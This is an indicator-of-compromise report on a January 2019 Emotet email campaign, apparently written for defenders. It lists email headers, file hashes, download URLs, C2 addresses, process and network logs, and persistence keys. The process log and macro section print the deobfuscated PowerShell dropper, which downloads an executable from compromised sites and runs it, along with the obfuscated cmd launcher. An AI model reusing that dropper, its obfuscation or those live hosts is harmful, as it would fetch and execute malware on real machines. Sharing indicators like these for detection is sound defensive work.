#emotet_230119

1. #IOC #OptiData #VR #emotet #feodo #banker #xml #powershell
2.  
3. https://pastebin.com/D9TDts5J
4.  
5. previous contact:
6. 20/12/18 https://pastebin.com/EejcbL4t
7. 04/12/18 https://pastebin.com/znQDtbnt
8. 09/11/18 https://pastebin.com/THHMs2wg
9. 01/10/18 https://pastebin.com/Y6DnbpHv
10.  
11. FAQ:
12. https://twitter.com/dvk01uk/status/1087660817452011520
13. https://pastebin.com/g8gMJKui
14. https://radetskiy.wordpress.com/2018/10/19/ioc_emotet_011018/
15. https://kc.mcafee.com/corporate/index?page=content&id=KB90108
16.  
17. attack_vector
18. --------------
19. email attach .doc (XML) > macro > cmd > powershell_v5(!) > GET 5 URL > %temp%\***.exe
20.  
21. email_headers
22. --------------
23. Received: from ded1262.inmotionhosting.com (ded1262.inmotionhosting.com [173.247.255.190])
24. by srv8.victim1.com (8.15.2/8.15.2) for <[email protected]>;
25. Thu, 24 Jan 2019 07:33:34 +0200 (EET)
26. (envelope-from [email protected])
27. Received: from [104.152.233.226] (port=53273 helo=10.15.58.80)
28. by ded1262.inmotionhosting.com with esmtpsa
29. (envelope-from <[email protected]>)
30. for [email protected];
31. Wed, 23 Jan 2019 07:49:42 -0800
32. Date: Wed, 23 Jan 2019 07:49:38 -0800
33. From: С ув.Андрей Сикорский 066-105-91-55,093-992-66-84 b2motor.com <[email protected]>
34. To: [email protected]
35. Subject: Aw: Outstanding INVOICE XPAHS/2921629/1194
36.  
37. files
38. --------------
39. SHA-256 339c428878402bf90c1ff0653d51626cfa6adff27a13adf75a42ed26d138b59f
40. File name FILE-T00978774.doc
41. File size 258.31 KB
42.  
43. SHA-256 1e95b89a23fc36786d336b4bfd4c0a6fb84630bb62e34270da6b604fd9bf7d8a
44. File name aBQ0J3QEI0nmVgZS0xq.exe [from galvanengenharia.com 1st]
45. File size 229.5 KB
46.  
47. SHA-256 f8e3c1cf0eafcbd54f0e26dbb7ca108a0a3f3a97546504af8a9e03ee75949189
48. File name XisJxx7N143.exe [from imarketsforextrading.com]
49. File size 238.5 KB
50.  
51. SHA-256 829c9c9d7d1f238e97bd3307392dad0f1537906505b694f1199ec9ddbee3bd52
52. File name f76rt7cruttl6.exe [from galvanengenharia.com 2nd]
53. File size 242 KB
54.  
55. activity
56. **************
57.  
58. powershell
59. powershtll
60.  
61. deobfuscated_macro
62. --------------
63. command: powershell $ntij='vcshw';$fkkv=new-object Net.WebClient;$jrpoz='imarketsforextrading{.} com/vpFtztlmbWLmXZWL@gencbafralilar{.} com/wp-admin/css/MSTealncf2Y_JI@north-bear{.} ru/SLiZjYZC4ZYAVon@galvanengenharia{.} com/NLuJg0pMQ6qrvYd4G_c0@nancybrouwer{.} nl/D8LOhbAH25ha'.Split('@');$qsqp='iowi';$bddaq = '168';$cuvfr='vwlui';$jbbj=$env:temp+'\'+$bddaq+'.exe';foreach($douz in $jrpoz){try{$fkkv.DownloadFile($douz, $jbbj);$ijqu='acino';If ((Get-Item $jbbj).length -ge 40000) {Invoke-Item $jbbj;$qpop='psah';break;}}catch{}}$zwpth='ibah';
64.  
65. pl_src: 1/5
66. --------------
67. imarketsforextrading{.} com/vpFtztlmbWLmXZWL/ not_downld
68. gencbafralilar{.} com/wp-admin/css/MSTealncf2Y_JI 404
69. north-bear{.} ru/SLiZjYZC4ZYAVon 503
70. galvanengenharia{.} com/NLuJg0pMQ6qrvYd4G_c0/ 200
71. nancybrouwer{.} nl/D8LOhbAH25ha blocked
72.  
73. C2:
74. --------------
75. 182.180.170.72:22
76. 189.253.39.50:8080
77.  
78. netwrk
79. --------------
80. 104.225.130.135 www.imarketsforextrading.com GET /vpFtztlmbWLmXZWL HTTP/1.1 noUA
81. 5.250.241.110 gencbafralilar.com GET /wp-admin/css/MSTealncf2Y_JI HTTP/1.1 noUA
82. 92.53.114.3 north-bear.ru GET /SLiZjYZC4ZYAVon HTTP/1.1 noUA
83. 191.6.205.20 galvanengenharia.com GET /NLuJg0pMQ6qrvYd4G_c0 HTTP/1.1 noUA
84. 189.253.39.50 189.253.39.50:8080 GET / HTTP/1.1 Mozilla/4.0
85.  
86. comp
87. --------------
88. powershtll.exe 1152 104.225.130.135 80 ESTABLISHED
89. powershtll.exe 1152 5.250.241.110 80 ESTABLISHED
90. powershtll.exe 1152 92.53.114.3 80 ESTABLISHED
91. powershtll.exe 1152 191.6.205.20 80 ESTABLISHED
92.  
93. turnedbased.exe 2488 182.180.170.72 22 SYN_SENT
94. turnedbased.exe 2488 189.253.39.50 8080 ESTABLISHED
95.  
96. proc
97. --------------
98. c:\rjbv\qwqqb\mclaw\..\..\..\windows\system32\cmd.exe /c CmD /V:/C"set 78QN=Ue%x5FNB4D':drkCP@u{(XinhY$.byo1pq_)Ac6ETS3vH2V0+g,~ZGOQa=J z\l-wjL}/tf;m8MWIs&&for %X in (...)do set p0QM=!p0QM!!78QN:~%X,1!&&if %X gtr 78 echo !p0QM:~6!|FOR /F "tokens=2 delims==fkCg" %e IN ('assoc.cmd')DO %e "
99. CmD /V:/C"set 78QN=Ue%x5FNB4D':drkCP@u{(XinhY$.byo1pq_)Ac6ETS3vH2V0+g,~ZGOQa=J z\l-wjL}/tf;m8MWIs&&for %X in (...)do set p0QM=!p0QM!!78QN:~%X,1!&&if %X gtr 78 echo !p0QM:~6!|FOR /F "tokens=2 delims==fkCg" %e IN ('assoc.cmd')DO %e "
100. C:\Windows\system32\cmd.exe /S /D /c" echo pow%PUBLIC:~5,1%r%SESSIONNAME:~-4,1%h%TEMP:~-3,1%ll $ntij='vcshw';$fkkv=new-object Net.WebClient;$jrpoz='http://www.imarketsforextrading.com/vpFtztlmbWLmXZWL@http://gencbafralilar.com/wp-admin/css/MSTealncf2Y_JI@http://north-bear.ru/SLiZjYZC4ZYAVon@http://galvanengenharia.com/NLuJg0pMQ6qrvYd4G_c0@http://nancybrouwer.nl/D8LOhbAH25ha'.Split('@');$qsqp='iowi';$bddaq = '168';$cuvfr='vwlui';$jbbj=$env:temp+'\'+$bddaq+'.exe';foreach($douz in $jrpoz){try{$fkkv.DownloadFile($douz, $jbbj);$ijqu='acino';If ((Get-Item $jbbj).length -ge 40000) {Invoke-Item $jbbj;$qpop='psah';break;}}catch{}}$zwpth='ibah';"
101. C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=2 delims==fkCg" %e IN ('assoc.cmd') DO %e "
102. C:\Windows\system32\cmd.exe /c assoc.cmd
103. cmd
104. powershtll $ntij='vcshw';$fkkv=new-object Net.WebClient;$jrpoz='http://www.imarketsforextrading.com/vpFtztlmbWLmXZWL@http://gencbafralilar.com/wp-admin/css/MSTealncf2Y_JI@http://north-bear.ru/SLiZjYZC4ZYAVon@http://galvanengenharia.com/NLuJg0pMQ6qrvYd4G_c0@http://nancybrouwer.nl/D8LOhbAH25ha'.Split('@');$qsqp='iowi';$bddaq = '168';$cuvfr='vwlui';$jbbj=$env:temp+'\'+$bddaq+'.exe';foreach($douz in $jrpoz){try{$fkkv.DownloadFile($douz, $jbbj);$ijqu='acino';If ((Get-Item $jbbj).length -ge 40000) {Invoke-Item $jbbj;$qpop='psah';break;}}catch{}}$zwpth='ibah';
105. C:\tmp\168.exe
106. C:\Users\operator\AppData\Local\turnedbased\turnedbased.exe
107.  
108. (old)
109. "C:\Program Files (x86)\Microsoft Office\Office12\WINWORD.EXE" /n /dde
110. c:\rjbv\qwqqb\mclaw\..\..\..\windows\system32\cmd.exe .... gtr 78 echo !p0QM:~6!|FOR /F "tokens=2 delims==fkCg" %e IN ('assoc.cmd')DO %e "
111. CmD /V:/C"set 78QN=Ue%x5FNB4D':drkCP@u... gtr 78 echo !p0QM:~6!|FOR /F "tokens=2 delims==fkCg" %e IN ('assoc.cmd')DO %e "
112. C:\Windows\system32\cmd.exe /S /D /c" echo pow%PUBLIC:~5,1%r%SESSIONNAME:~-4,1%h%TEMP:~-3,1%ll ...
113. C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=2 delims==fkCg" %e IN ('assoc.cmd') DO %e "
114. C:\Windows\system32\cmd.exe /c assoc.cmd
115. C:\Windows\system32\cmd.exe powershell $ntij='vcshw';$fkkv=new-object Net.WebClient;... $jbbj=$env:temp+'\'+$bddaq+'.exe';... {Invoke-Item $jbbj;$qpop='psah';break;}}catch{}}$zwpth='ibah';
116. "C:\Users\operator\AppData\Local\Temp\168.exe"
117. "C:\Users\operator\AppData\Local\Temp\168.exe"
118. "C:\Users\operator\AppData\Local\wabmetagen\wabmetagen.exe"
119. "C:\Users\operator\AppData\Local\wabmetagen\wabmetagen.exe"
120.  
121. persist
122. --------------
123. HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 25.01.2019 14:39
124. turnedbased 3dfxTools Common Library 3dfx Interactive, Inc.
125. c:\users\operator\appdata\local\turnedbased\turnedbased.exe 25.01.2019 22:40
126.  
127. drop
128. --------------
129. C:\tmp\168.exe
130. C:\Users\operator\AppData\Local\turnedbased\turnedbased.exe
131.  
132. # # #
133. https://www.virustotal.com/#/file/339c428878402bf90c1ff0653d51626cfa6adff27a13adf75a42ed26d138b59f/details
134.  
135. https://www.virustotal.com/#/file/1e95b89a23fc36786d336b4bfd4c0a6fb84630bb62e34270da6b604fd9bf7d8a/details
136. https://analyze.intezer.com/#/analyses/af88b324-e56b-4fd1-a8af-25a97d0163f2
137.  
138. https://www.virustotal.com/#/file/f8e3c1cf0eafcbd54f0e26dbb7ca108a0a3f3a97546504af8a9e03ee75949189/details
139. https://analyze.intezer.com/#/analyses/20ce9259-1f35-41b9-8eb1-7d1408865a77
140.  
141. https://www.virustotal.com/#/file/829c9c9d7d1f238e97bd3307392dad0f1537906505b694f1199ec9ddbee3bd52/details
142. https://analyze.intezer.com/#/analyses/200c4e09-f2ea-42c2-a803-1f98537d92af
143.  
144. VR
145.  
146. @